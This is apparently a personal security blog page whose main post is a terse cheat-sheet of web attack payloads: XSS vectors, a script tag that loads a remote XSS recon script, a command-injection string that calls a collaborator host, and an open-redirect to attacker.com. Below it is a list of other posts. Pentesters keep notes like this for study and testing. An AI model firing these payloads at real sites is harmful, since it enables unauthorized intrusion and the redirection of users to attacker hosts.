Web App Security

Cross-site scripting (XSS) SQL injection Cross-site request forgery XML external entity injection Directory traversal Server-side request forgery

XSS test test </script/x>alert(1)</script/x> <svg/onload=alert("1") <a src=www.google.com>test</a> <h1>t</h1> <H1>T >’>”><img src=x onerror=alert(0)> “><img src=x onerror=prompt(document.domain)>

<script alert(9)</script>.jpeg
<script>alert(1)</script>
</script/x>alert(1)</script/x>
<svg/onload=alert(\"1\")
xss?name=Bob<script src='https://demoapp.loc/js/script?v=1.7.3.css%2522/>%2527)%3Balert(%2522Yeah!%2520Chaining!%2522)%3B//'></script>
?<script src="https://raw.githubusercontent.com/nettitude/xss_payloads/master/recon.php"></script>

Injection |%7cnslookup%20(collabip)%20%23 %7cping%20-c%2015%20127.0.0.1%20%23

redirect https://example.com/signup?redirectUrl=https://attacker.com/ inurl:redirectUrl=http site:target.com

test dulu source-code


Solution

kk
ss

test

2022

Back to top ↑

2019

Web App Security

less than 1 minute read

Cross-site scripting (XSS) SQL injection Cross-site request forgery XML external entity injection Directory traversal Server-side request forgery

beginner note

less than 1 minute read

Guten Tag everyone. This is basic notes for the things that you must to know before doing RE and pwn.

Pico2018 Overflow 0

less than 1 minute read

Hey peeps, in this write up, i will only focus on binary exploiattaion only as it is my first that i’m able to solve pwn challenge. heehee… lesugo

Back to top ↑